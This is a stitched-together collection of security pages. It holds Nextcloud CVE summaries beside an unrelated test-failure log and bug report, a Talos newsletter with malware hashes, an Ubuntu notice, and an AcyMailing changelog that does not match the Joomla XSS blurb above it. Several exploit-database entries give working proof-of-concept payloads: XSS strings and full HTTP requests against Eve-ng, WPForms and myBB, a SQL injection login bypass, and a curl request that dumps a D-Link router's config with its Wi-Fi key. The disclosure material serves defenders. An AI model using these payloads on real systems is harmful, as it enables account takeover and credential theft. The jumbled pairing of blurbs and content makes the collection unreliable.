Nextcloud server is an open source home cloud implementation. In releases of the 25.0.x branch before 25.0.3 an inefficient fetch operation may impact server performances and/or can lead to a denial of service. This issue has been addressed and it is recommended that the Nextcloud Server is upgraded to 25.0.3. There are no known workarounds for this vulnerability.

    There was 1 failure: | 59s
    -- | --
    654 |   | 59s
    655 | 1) OCA\Settings\Tests\Controller\CheckSetupControllerTest::testCheck | 59s
    656 | Failed asserting that two objects are equal. | 59s
    657 | --- Expected | 59s
    658 | +++ Actual | 59s
    659 | @@ @@ | 59s
    660 | 'OCA\Settings\SetupChecks\PhpOutputBuffering' => Array (...) | 59s
    661 | 'OCA\Settings\SetupChecks\LegacySSEKeyFormat' => Array (...) | 59s
    662 | 'OCA\Settings\SetupChecks\CheckUserCertificates' => Array (...) | 59s
    663 | -        'imageMagickLacksSVGSupport' => false | 59s
    664 | +        'imageMagickLacksSVGSupport' => true

CVE-2023-28644: Add restrictions when downloading to resolve with opengraph link provider by julien-nc · Pull Request #36016 · nextcloud/server

Nextcloud server is an open source home cloud implementation. In affected versions when a recipient receives 2 shares with the same name, while a memory cache is configured, the second share will replace the first one instead of being renamed to `{name} (2)`. It is recommended that the Nextcloud Server is upgraded to 25.0.3 or 24.0.9. Users unable to upgrade should avoid sharing 2 folders with the same name to the same user.

**⚠️ This issue respects the following points: ⚠️**

*   This is a **bug**, not a question or a configuration/webserver/proxy issue.
*   This issue is **not** already reported on Github _(I've searched it)_.
*   Nextcloud Server **is** up to date. See Maintenance and Release Schedule for supported versions.
*   Nextcloud Server **is** running on 64bit capable CPU, PHP and OS.
*   I agree to follow Nextcloud's Code of Conduct.

**Bug description**

When two or more (sending) users share a folder with the same (receiving) user, that receiving user will only see the folder of the latest (sending) user under the "shared" folder, without necessarily being aware of it. The other folders will only reappear if the receiving user renames the folder seen.

The issue was originally raised at https://help.nextcloud.com/t/shared-folder-with-same-name-starts-override-each-other-at-recipient-view/142574/3.

IMHO this is a critical bug, which could pose a major digital security risk that could be exploited to inject malicious files in another user's folder.

But irrespective of this, users that share their (default) folders should not have to worry about name collisions.

**Steps to reproduce**

1.Alice shares her "Document" folder with Charly => Charly sees Alice's "Document" folder  
2.Bob shares his "Document" folder with Charly => Charly only sees Bob's "Document" folder.  
3.Mallory shares his "Document" folder, which contains malware with Charly => Charly only sees Mallory's "Document" folder and may believe this is still Alice's Document folder.

**Expected behavior**

Charly should see all three folders: Alice's, Bob's and Mallory's "Document" folders, which may be renamed as "Document (Alice)", "Document (Bob)" and "Document (Mallory)" respectively.

**Installation method**

Community Docker image

**Operating system**

Fedora 36

**PHP engine version**

PHP 8.0

**Web server**

Apache (supported)

**Database engine version**

PostgreSQL

**Is this bug present after an update or on a fresh install?**

Fresh Nextcloud Server install

**Are you using the Nextcloud Server Encryption module?**

Encryption is Enabled

**What user-backends are you using?**

*   Default user-backend _(database)_
*   LDAP/ Active Directory
*   SSO - SAML
*   Other

**Configuration report**

{
    "system": {
        "memcache.local": "\\\\OC\\\\Memcache\\\\APCu",
        "apps\_paths": \[
            {
                "path": "\\/var\\/www\\/html\\/apps",
                "url": "\\/apps",
                "writable": false
            },
            {
                "path": "\\/var\\/www\\/html\\/custom\_apps",
                "url": "\\/custom\_apps",
                "writable": true
            }
        \],
        "memcache.distributed": "\\\\OC\\\\Memcache\\\\Redis",
        "memcache.locking": "\\\\OC\\\\Memcache\\\\Redis",
        "redis": {
            "host": "\*\*\*REMOVED SENSITIVE VALUE\*\*\*",
            "password": "\*\*\*REMOVED SENSITIVE VALUE\*\*\*",
            "port": 6379
        },
        "overwritehost": "\*\*\*REMOVED SENSITIVE VALUE\*\*\*",
        "overwriteprotocol": "https",
        "passwordsalt": "\*\*\*REMOVED SENSITIVE VALUE\*\*\*",
        "secret": "\*\*\*REMOVED SENSITIVE VALUE\*\*\*",
        "trusted\_domains": \[
            "localhost",
            "\*\*\*REMOVED SENSITIVE VALUE\*\*\*"
        \],
        "datadirectory": "\*\*\*REMOVED SENSITIVE VALUE\*\*\*",
        "dbtype": "pgsql",
        "version": "24.0.4.1",
        "overwrite.cli.url": "\*\*\*REMOVED SENSITIVE VALUE\*\*\*",
        "dbname": "\*\*\*REMOVED SENSITIVE VALUE\*\*\*",
        "dbhost": "\*\*\*REMOVED SENSITIVE VALUE\*\*\*",
        "dbport": "",
        "dbtableprefix": "oc\_",
        "dbuser": "\*\*\*REMOVED SENSITIVE VALUE\*\*\*",
        "dbpassword": "\*\*\*REMOVED SENSITIVE VALUE\*\*\*",
        "installed": true,
        "instanceid": "\*\*\*REMOVED SENSITIVE VALUE\*\*\*",
        "loglevel": "2",
        "log\_type": "file",
        "logfile": "\\/var\\/www\\/html\\/data\\/nextcloud.log",
        "log\_rotate\_size": "10485760",
        "log.condition": {
            "apps": \[
                "admin\_audit"
            \]
        },
        "preview\_max\_x": "2048",
        "preview\_max\_y": "2048",
        "jpeg\_quality": "60",
        "enabledPreviewProviders": {
            "1": "OC\\\\Preview\\\\Image",
            "2": "OC\\\\Preview\\\\MarkDown",
            "3": "OC\\\\Preview\\\\MP3",
            "4": "OC\\\\Preview\\\\TXT",
            "5": "OC\\\\Preview\\\\OpenDocument",
            "6": "OC\\\\Preview\\\\Movie"
        },
        "enable\_previews": true,
        "upgrade.disable-web": true,
        "mail\_smtpmode": "smtp",
        "trashbin\_retention\_obligation": "auto, 30",
        "versions\_retention\_obligation": "auto, 30",
        "activity\_expire\_days": "30",
        "simpleSignUpLink.shown": false,
        "share\_folder": "\\/Shared",
        "one-click-instance": true,
        "one-click-instance.user-limit": 100,
        "htaccess.RewriteBase": "\\/",
        "files\_external\_allow\_create\_new\_local": false,
        "trusted\_proxies": "\*\*\*REMOVED SENSITIVE VALUE\*\*\*"
    }
}

**List of activated Apps**

Enabled:
  - accessibility: 1.10.0
  - activity: 2.16.0
  - admin\_audit: 1.14.0
  - apporder: 0.15.0
  - bruteforcesettings: 2.4.0
  - calendar: 3.5.0
  - circles: 24.0.1
  - cloud\_federation\_api: 1.7.0
  - comments: 1.14.0
  - contacts: 4.2.0
  - contactsinteraction: 1.5.0
  - dashboard: 7.4.0
  - dav: 1.22.0
  - deck: 1.7.1
  - encryption: 2.12.0
  - event\_update\_notification: 1.5.0
  - federatedfilesharing: 1.14.0
  - federation: 1.14.0
  - files: 1.19.0
  - files\_external: 1.16.1
  - files\_pdfviewer: 2.5.0
  - files\_rightclick: 1.3.0
  - files\_sharing: 1.16.2
  - files\_trashbin: 1.14.0
  - files\_versions: 1.17.0
  - files\_videoplayer: 1.13.0
  - firstrunwizard: 2.13.0
  - logreader: 2.9.0
  - lookup\_server\_connector: 1.12.0
  - nextcloud-aio: 0.2.0
  - nextcloud\_announcements: 1.13.0
  - notes: 4.5.1
  - notifications: 2.12.0
  - notify\_push: 0.4.0
  - oauth2: 1.12.0
  - password\_policy: 1.14.0
  - phonetrack: 0.7.0
  - photos: 1.6.0
  - privacy: 1.8.0
  - provisioning\_api: 1.14.0
  - recommendations: 1.3.0
  - serverinfo: 1.14.0
  - settings: 1.6.0
  - sharebymail: 1.14.0
  - socialsharing\_email: 2.5.0
  - support: 1.7.0
  - survey\_client: 1.12.0
  - systemtags: 1.14.0
  - tasks: 0.14.4
  - text: 3.5.1
  - theming: 1.15.0
  - twofactor\_backupcodes: 1.13.0
  - twofactor\_totp: 6.4.0
  - user\_status: 1.4.0
  - viewer: 1.8.0
  - weather\_status: 1.4.0
  - workflowengine: 2.6.0
Disabled:
  - cookbook: 0.9.14
  - grauphel
  - socialsharing\_diaspora: 2.5.0
  - user\_ldap

**Nextcloud Signing status**

_No response_

**Nextcloud Logs**

_No response_

**Additional info**

_No response_

CVE-2023-28643: [Bug]:  Name collision of shared folders · Issue #34015 · nextcloud/server

Very few of us looking to buy these pieces of equipment are qualified to say if these products are even secure, and those among us who are are probably smart enough to know not to buy these products in the first place.

Thursday, March 30, 2023 14:03

Welcome to this week’s edition of the Threat Source newsletter.

Everyone loves a good video of someone slipping on their icy steps in the winter, captured thanks to their home security camera or smart doorbell. But what about when that camera is just kind of chilling out and not catching the moment your dog takes off after that squirrel?

The world of security cameras and recording devices attached to one’s home is becoming increasingly murky by the day. Law enforcement officials are finding ways to compel the companies that manufacture and manage these devices to turn over homeowners’ footage, even if the homeowner doesn’t consent to it.

And Amazon Ring, the biggest player in this space now, may or may not be the target of a ransomware attack.

So, while consumers might be purchasing these devices to ensure their physical security, the question about if these products are good for online security is a major question mark.

As Talos’ own Joe Marshall wrote in a guest column at Dark Reading this week, “IoT vendors continue to fail us on implementing solid cybersecurity controls.” This even goes for some of the largest tech companies in the world who would conceivably have the most money to invest in securing and testing these devices before they hit the market.

There are tons of budget options on the market that, unless you are an expert vulnerability researcher, are impossible to fully vet. I just went to Amazon’s website this week and searched for “smart doorbell.” Three of the best-selling items on the first page of results use nearly the exact same thumbnail art to advertise the product. Yet when you go to their product pages, each one is listed as being manufactured or sold by a different company.

If you’re merely reading the reviews of these products to figure out what’s right for you, or searching the internet for someone else’s review, they may mention if the resolution quality is up to snuff or if the app works well, but I doubt the reviewer has the time to physically tear apart the device looking for vulnerabilities or combing through the API for security holes. And if we can’t even trust the companies making these devices to differentiate their products based on appearance, there is no way to know how they may be prepared to respond to a data breach or what their stance is on sharing footage with law enforcement.

The same goes for security cameras. On Amazon’s search page for “home security camera,” the top five non-sponsored results are all made by different companies (Ring being one of them) and based on the features they offer, it’s nearly impossible to differentiate them outside of a difference in form factor. Very few of us looking to buy these pieces of equipment are qualified to say if these products are even secure, and those among us who are are probably smart enough to know not to buy these products in the first place.

I certainly wouldn’t stop anyone from buying a home security camera if they truly feel it improves their families’ safety. But I think that, no matter what brand we buy, everyone just needs to assume now that they’re taking a risk with their privacy and online security as a trade-off for catching possible package burglars.

**The one big thing**

Emotet is back from the dead once again. Since returning, Emotet has leveraged several distinct infection chains, indicating that they are modifying their approach based on their perceived success in infecting new systems. The initial emails delivered to victims are consistent with what has been observed from Emotet over the past several years.

Why do I care?

Emotet is arguably the most infamous botnet on the threat landscape, so it’s notable any time it spins back up. This network is known to go through quiet periods and then pop back up, so this isn’t particularly surprising, but it is noteworthy because Emotet’s creators are switching up their tactics by switching to new types of lure documents to evade detection and recent changes Microsoft made to macros to try and stop attackers from using malicious Office attachments.

**So now what?**

Because Emotet has been around for so long now, Cisco Secure and Talos have an exhaustive list of ways to stay protected from Emotet spam. But as a good general reminder, always make sure you triple-check the “From” field in an email to make sure it’s actually from who you think its from. And never open an attachment or click on a link in an email unless you’re sure it’s the correct destination.

**Top security headlines of the week**

**Defenders and detractors of TikTok both seem unmoved** after the popular social media app’s CEO testified in front of a U.S. Congressional panel last week. Lawmakers who are in favor of a blanket ban on the app in the U.S. over data and privacy concerns were unimpressed with the answers the company’s lead provided, while others mocked lawmakers for the types of questions they asked and instead advocated for broader data privacy laws. Republicans in Congress still plan to take up legislation to ban TikTok, with House Speaker Kevin McCarthy tweeting that, “It’s very concerning that the CEO of TikTok can’t be honest and admit what we already know to be true — China has access to TikTok user data.” (Buzzfeed, The Hill, The New Yorker)

**A bug in the popular ChatGPT AI tool exposed other users’ message history** and may have also leaked sensitive information like the payment information and emails of premium users. OpenAI, the company behind ChatGPT, took the tool offline last Tuesday for emergency maintenance after they became aware of the issue. The company confirmed the information was exposed during a nine-hour window on March 20, but it could have been exposed prior to that. The data leak exposes concerns that many users have around using tools like ChatGPT to share sensitive or potentially confidential information. (SecurityWeek, Engadget)

**A data breach at Latitude Financial affects millions of people in New Zealand and Australia,** potentially dating back to 2005. The personal lending company said attackers stole around 7.9 million driver’s license numbers and 53,000 passport numbers. Names, addresses, phone numbers and dates of birth are also among the data stolen. When Latitude first announced the attack on March 16, it estimated that 300,000 customers had been affected, but the number has grown as the investigation continued, though the company stopped the breach prior to the disclosure. The breach has called into question why financial companies retain records for so long after a customer has applied for financing and how that data is stored. (The Guardian, Yahoo Finance)

**Can’t get enough Talos?**

*   Talos Takes Ep. #132: Reflecting on one year of Talos' work in Ukraine
*   Graphic novel: Life inside the Talos Ukraine Task Unit
*   How an incident response retainer can drive proactive security
*   Threat Roundup for March 17 - 24
*   If your Netgear Orbi router isn’t patched, you’ll want to change that pronto

**Upcoming events where you can find Talos**

**RSA** **(April 24 - 27)**

San Francisco, CA

**Cisco Live U.S.** **(June 4 - 8)**

Las Vegas, NV

**Most prevalent malware files from Talos telemetry over the past week**

  
**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
**MD5:** 93fefc3e88ffb78abb36365fa5cf857c  
**Typical Filename:** Wextract  
**Claimed Product:** Internet Explorer  
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

**SHA 256:** 00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725  
**MD5:** d47fa115154927113b05bd3c8a308201  
**Typical Filename:** mssqlsrv.exe  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.65065311

**SHA 256:** de3908adc431d1e66656199063acbb83f2b2bfc4d21f02076fe381bb97afc423  
**MD5:** 954a5fc664c23a7a97e09850accdfe8e  
**Typical Filename:** teams15.exe  
**Claimed Product:** teams15  
**Detection Name:** Gen:Variant.MSILHeracles.59885

**SHA 256:** c74e7421f2021b46ee256e5f02d94c1bce15da107c8c997c611055412de1ac1  
**MD5:** 2d16d0af6183803a79d9ef5c744286c4  
**Typical Filename:** nano\_download.php  
**Claimed Product:** Web Companion Installer  
**Detection Name:** W32.1C74E7421F-100.SBX.VIOC

**SHA 256:** 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1  
**MD5:** 3e10a74a7613d1cae4b9749d7ec93515  
**Typical Filename:** IMG001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Coinminer::1201

Threat Source newsletter (March 30, 2023) — It’s impossible to tell if your home security camera or doorbell is truly safe

Eve-ng version 5.0.1-13 suffers from a cross site scripting vulnerability.

    # Exploit Title: Eve-ng 5.0.1-13 - Stored Cross-Site Scripting (XSS) # Google Dork: N/A# Date: 12/6/2022# Exploit Author: @casp3r0x0 hassan ali al-khafaji# Vendor Homepage: https://www.eve-ng.net/# Software Link: https://www.eve-ng.net/index.php/download/# Version: Free EVE Community Edition Version 5.0.1-13# Tested on: Free EVE Community Edition Version 5.0.1-13# CVE : N/A#we could achieve stored XSS on eve-ng free I don't know If thiseffect pro version also#first create a new lab#second create a Text label#insert the xss payload and click save "><script>alert(1)</script>#the application is multi user if any user open the lab the xss will be triggered.

Eve-ng 5.0.1-13 Cross Site Scripting

WordPress WPForms plugin version 1.7.8 suffers from a cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: WPForms 1.7.8 - Cross-Site Scripting (XSS)# Date: 2022-12-05# Author: Milad karimi# Software Link: https://wordpress.org/plugins/wpforms-lite# Version: 1.7.8# Tested on: Windows 10# CVE: N/A1. Description:This plugin creates a WPForms from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.2. Proof of Concept:https://$target/ListTable.php?foobar=<script>alert("Ex3ptionaL")</script>

WordPress WPForms 1.7.8 Cross Site Scripting

DSL-124 Wireless N300 ADSL2+ suffers from a backup disclosure vulnerability.

    # Exploit Title: DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure# Date:  2022-11-10# Exploit Author: Aryan Chehreghani# Vendor Homepage: https://www.dlink.com# Software Link: https://dlinkmea.com/index.php/product/details?det=dU1iNFc4cWRsdUpjWEpETFlSeFlZdz09# Firmware Version: ME_1.00# Tested on: Windows 11# [ Details - DSL-124 ]:#The DSL-124 Wireless N300 ADSL2+ Modem Router is a versatile, high-performance router for a home or small office,#With integrated ADSL2/2+, supporting download speeds up to 24 Mbps, firewall protection,#Quality of Service (QoS),802.11n wireless LAN, and four Ethernet switch ports,#the Wireless N300 ADSL2+ Modem Router provides all the functions that a user needs to establish a secure and high-speed link to the Internet.# [ Description ]:#After the administrator enters and a new session is created, the attacker sends a request using the post method in her system,#and in response to sending this request, she receives a complete backup of the router settings,#In fact this happens because of the lack of management of users and sessions in the network.# [ POC ]:Request :curl -d "submit.htm?saveconf.htm=Back+Settings" -X POST http://192.168.1.1/form2saveConf.cgiResponse :HTTP/1.1 200 OKConnection: closeServer: Virtual Web 0.9Content-Type: application/octet-stream;Content-Disposition: attachment;filename="config.img"Pragma: no-cacheCache-Control: no-cache<Config_Information_File_8671><V N="WLAN_WPA_PSK" V="pass@12345"/><V N="WLAN_WPA_PSK_FORMAT" V="0x0"/><V N="WLAN_WPA_REKEY_TIME" V=""/><V N="WLAN_ENABLE_1X" V="0x0"/><V N="WLAN_ENABLE_MAC_AUTH" V="0x0"/><V N="WLAN_RS_IP" V="0.0.0.0"/>...</Config_Information_File_8671>

DSL-124 Wireless N300 ADSL2+ Backup Disclosure

Ubuntu Security Notice 5983-1 - Cyku Hong discovered that Nette was not properly handling and validating data used for code generation. A remote attacker could possibly use this issue to execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5983-1  
March 29, 2023

php-nette vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS  
- Ubuntu 16.04 ESM

Summary:

Nette could be made to run programs if it received specially crafted  
network traffic.

Software Description:  
- php-nette: Nette Framework

Details:

Cyku Hong discovered that Nette was not properly handling and validating  
data used for code generation. A remote attacker could possibly use this  
issue to execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS:  
   php-nette                       2.4-20160731-1ubuntu0.1

Ubuntu 16.04 ESM:  
   php-nette                       2.3.8-1ubuntu1+esm1

After a standard system update you need to restart any applications using  
Nette to make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5983-1  
   CVE-2020-15227

Package Information:  
https://launchpad.net/ubuntu/+source/php-nette/2.4-20160731-1ubuntu0.1

Ubuntu Security Notice USN-5983-1

myBB forums version 1.8.26 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: myBB forums 1.8.26 - Stored Cross-Site Scripting (XSS)   
# Exploit Author: Andrey Stoykov  
# Software Link: https://mybb.com/versions/1.8.26/  
# Version: 1.8.26  
# Tested on: Ubuntu 20.04

Stored XSS #1:

To reproduce do the following:

1. Login as administrator user  
2. Browse to "Templates and Style" -> "Templates" -> "Manage Templates" -> =  
"Global Templates"=20  
3. Select "Add New Template" and enter payload "><img src=3Dx onerror=3Dale=  
rt(1)>

// HTTP POST request showing XSS payload

POST /mybb_1826/admin/index.php?module=3Dstyle-templates&action=3Dedit_temp=  
late HTTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&title=3D"><img+src=3Dx+onerr=  
or=3Dalert(1)>&sid=3D-1&template=3D&continue=3DSave+and+Continue+Editing

// HTTP redirect response to specific template

HTTP/1.1 302 Found  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
Location: index.php?module=3Dstyle-templates&action=3Dedit_template&title=  
=3D%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&sid=3D-1  
[...]

// HTTP GET request to newly created template

GET /mybb_1826/admin/index.php?module=3Dstyle-templates&sid=3D-1 HTTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

// HTTP response showing unsanitized XSS payload

HTTP/1.1 200 OK  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
X-Powered-By: PHP/5.6.40  
[...]

<tr class=3D"first">  
<td class=3D"first"><a href=3D"index.php?module=3Dstyle-templates&actio=  
n=3Dedit_template&title=3D%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3=  
E&sid=3D-1">"><img src=3Dx onerror=3Dalert(1)></a></td>  
[...]

Stored XSS #2:

To reproduce do the following:

1. Login as administrator user  
2. Browse to "Forums and Posts" -> "Forum Management"  
3. Select "Add New Forum" and enter payload "><script>alert(1)</script>

// HTTP POST request showing XSS payload

POST /mybb_1826/admin/index.php?module=3Dforum-management&action=3Dadd HTTP=  
/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&type=3Df&title=3D"><script>a=  
lert(1)</script>&description=3D"><script>alert(2)</script[...]

// HTTP response showing successfully added a new forum

HTTP/1.1 200 OK  
Date: Sun, 20 Nov 2022 11:00:28 GMT  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
[...]

// HTTP GET request to fetch forums

GET /mybb_1826/admin/index.php?module=3Dforum-management HTTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

// HTTP response showing unsanitized XSS payload

HTTP/1.1 200 OK  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
[...]

<small>Sub Forums:  <a href=3D"index.php?module=3Dforum-management&fid=  
=3D3">"><script>alert(1)</script></a></small>

Stored XSS #3:

To reproduce do the following:

1. Login as administrator user  
2. Browse to "Forums and Posts" -> "Forum Announcements"  
3. Select "Add Announcement" and enter payload "><img+src=3Dx+onerror=3Dale=  
rt(1)>

// HTTP POST request showing XSS payload

POST /mybb_1826/admin/index.php?module=3Dforum-announcements&action=3Dadd H=  
TTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&title=3D"><img+src=3Dx+onerr=  
or=3Dalert(1)>&starttime_day=3D20&starttime_month=3D11&starttime_year=3D202=  
2&starttime_time=3D11:05+AM&endtime_day=3D20&endtime_month=3D11&endtime_yea=  
r=3D2023&endtime_time=3D11:05+AM&endtime_type=3D2&message=3D"><script>alert=  
(2)</script>&fid=3D2&allowmycode=3D1&allowsmilies=3D1

// HTTP response showing successfully added an anouncement

HTTP/1.1 302 Found  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
[...]

// HTTP GET request to fetch forum URL

GET /mybb_1826/ HTTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

// HTTP response showing unsanitized XSS payload

HTTP/1.1 200 OK  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
[...]

<a href=3D"forumdisplay.php?fid=3D3" title=3D"">"><script>alert(1)</script>=  
</a>

--sgnirk-590ebdc0-1da1-4f35-a731-39a2519b1c0d--

myBB forums 1.8.26 Cross Site Scripting

Helmet Store Showroom version 1.0 suffers from a remote SQL injection vulnerability that allows for login bypass.

    # Exploit Title: Helmet Store Showroom v1.0 - SQL Injection# Exploit Author: Ameer Hamza# Date: November 15, 2022# Vendor Homepage: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html# Software Link: https://www.sourcecodester.com/download-code?nid=15851&title=Helmet+Store+Showroom+Site+in+PHP+and+MySQL+Free+Source+Code# Tested on: Kali Linux, Apache, Mysql# Vendor: oretnom23# Version: v1.0# Exploit Description:# Helmet Store Showroom v1.0 suffers from SQL injection on the login page which leads to authentication bypass of the admin account.[+] The username parameter is vulnerable to SQLi in login page[+] URL --> http://localhost/hss/admin/login.php[+] Username = ' OR 1=1-- -HTTP REQUESTPOST /hss/classes/Login.php?f=login HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 38Origin: http://localhostConnection: closeReferer: http://localhost/hss/admin/login.phpCookie: PHPSESSID=08o3sl7jk4l442gq19s1t3hvpausername='+OR+1%3D1+--+-&password=1234

Helmet Store Showroom 1.0 SQL Injection

AnyMailing Joomla Plugin is vulnerable to stored cross site scripting (XSS) in templates and emails of AcyMailing, exploitable without authentication when access is granted to the campaign's creation on front-office. This issue affects AnyMailing Joomla Plugin Enterprise in versions below 8.3.0.

*   **AcyMailing 5.10.18**
    
    December 10, 2020
    
    **Improvements & fixes**
    
*   **AcyMailing 6.19.3**
    
    December 18, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.19.2**
    
    December 10, 2020
    
    **Improvements**
    
    *   New button to be redirected on the wordpress support of AcyMailing
    
    **Bug fixes**
    
*   **AcyMailing 6.19.1**
    
    December 9, 2020
    
    **Bug fixes**
    
*   **AcyMailing 5.10.17**
    
    December 2, 2020
    
    **Improvements & fixes**
    
*   **AcyMailing 6.19.0**
    
    December 1, 2020
    
    **Features****Improvements****Bug fixes**
    
*   **AcyMailing 6.18.2**
    
    November 12, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.18.0**
    
    November 9, 2020
    
    **Features****Improvements****Bug fixes**
    
*   **AcyMailing 6.17.1**
    
    October 28, 2020
    
    **Bug fixes**
    
    *   Fixed date for scheduled campaign showing with the timezone
    
*   **AcyMailing 6.17.0**
    
    October 19, 2020
    
    **Features****Improvements****Bug fixes**
    
*   **AcyMailing 5.10.16**
    
    October 15, 2020
    
    **Features**
    
    *   A new plugin lets you restrict the available fields when importing users from the front-end
    
    **Improvements & fixes**
    
*   **AcyMailing 6.16.4**
    
    October 8, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.16.3**
    
    October 7, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.16.2**
    
    October 1, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.16.1**
    
    September 29, 2020
    
    **Bug fixes**
    
    *   Hide php warning from other plugins
    
*   **AcyMailing 6.16.0**
    
    September 28, 2020
    
    **Features****Improvements****Bug fixes**
    
*   **AcyMailing 6.15.1**
    
    Septempber 9, 2020
    
    **Improvements****Bug fixes**
    
*   **AcyMailing 6.15.0**
    
    September 7, 2020
    
    **Features****Improvements****Bug fixes**
    
*   **AcyMailing 6.14.1**
    
    August 19, 2020
    
    **Improvements**
    
    *   Remove check version in the starter version
    
    **Bug fixes**
    
*   **AcyMailing 6.14.0**
    
    August 17, 2020
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 5.10.15**
    
    August 7, 2020
    
    **Improvements****Bug fixes**
    
*   **AcyMailing 6.13.3**
    
    August 3, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.13.2**
    
    July 30, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.13.1**
    
    July 29, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.13.0**
    
    July 27, 2020
    
    **New features**
    
    *   New design and UX for listing toolbar
    *   Added the possibility to create a list on the import in the list selection modal
    *   Added settings for the following add-ons: article, DOCman, DPcalendar, Easyblog, Easyprofile, EventBooking, FlexiContent, Hikashop, ICagenda, JDownloads, JEvent, K2, RSEventPro, RSS, Seblod, Virtumart
    *   Added settings for the following add-ons: post, page, RSS, The Event Calendar, Woocommerce
    *   New Giphy integration in the drag and drop editor
    *   Added the possibility to create custom view for each add-on to override the content inserted in the drag and drop editor
    
    **Improvements****Bug fixes**
    
*   **AcyMailing 6.12.1**
    
    July 27, 2020
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 6.12.0**
    
    July 6, 2020
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 6.11.1**
    
    June 17, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.11.0**
    
    June 15, 2020
    
    **New features****Improvements**
    
    *   You can now add a message at the beginning of emails sent as tests
    *   Better display for the dynamic content insertion options (insertion of site articles in an email for example)
    *   The emails listing has been re-made: the "Campaigns" menu is renamed into "Emails" and the listing show four types of email
    *   The user listing has been improved, the data is displayed in a better way, and you can filter users by subscription
    *   The email creation has been improved, you can now pre-select the type of email you want to create (campaign / auto / scheduled / welcome / unsubscribe)
    *   You can now Unsubscribe / re-subscribe for all the lists at a time in the user edition page
    *   The bounce rule creation page has been improved and a presentation of the bounce handling feature has been added
    *   New export button on the lists listing to export subscribers
    *   The custom fields edition page has been redesigned and simplified
    *   The lists listing page has been improved and more information has been added
    *   New description field for lists, it will be added on the profile page as a tooltip in a future release
    *   The user "Source" is now easier to understand
    *   Cancel buttons added in various locations (import / export / mail edition...)
    *   New full translation in Japanese, Lithuanian, Spanish
    *   More translations in Catalan, Czech, Dutch, German, German (Switzerland), Norwegian (Bokmål), Polish, Romanian, Slovenian, Swedish
    
    **Bug fixes**
    
*   **AcyMailing 6.10.4**
    
    May 13, 2020
    
    **Improvements**
    
    *   PHP 7.4 compatibility
    *   Much easier way to attach a site with a license in the configuration
    *   The length of the "Email preview line" option is now limited to 255 characters
    *   The "Every week on Monday, Friday" trigger now takes the site's timezone into account in automations and periodic campaigns
    *   New security added on the custom fields names and unique code generation
    *   Better custom fields migration from the v5
    *   The shared servers email addresses are now handled in the bounce handling
